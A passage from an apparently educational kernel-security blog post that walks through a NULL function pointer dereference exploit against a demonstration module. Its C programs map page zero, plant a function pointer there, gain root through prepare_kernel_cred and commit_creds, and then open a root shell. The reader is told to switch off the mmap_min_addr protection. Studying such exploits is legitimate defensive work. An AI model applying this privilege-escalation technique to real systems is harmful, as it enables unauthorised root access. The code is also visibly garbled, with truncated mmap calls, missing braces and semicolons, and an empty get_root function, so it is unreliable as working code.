Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
typedef int (*commit_creds_t)(struct cred *new)

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;

/* This function will be executed in kernel mode. */
void get_root(void) {

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);

  fprintf(stderr, "Something went wrong?\n");
  return 1;

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.


Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.


« April 2014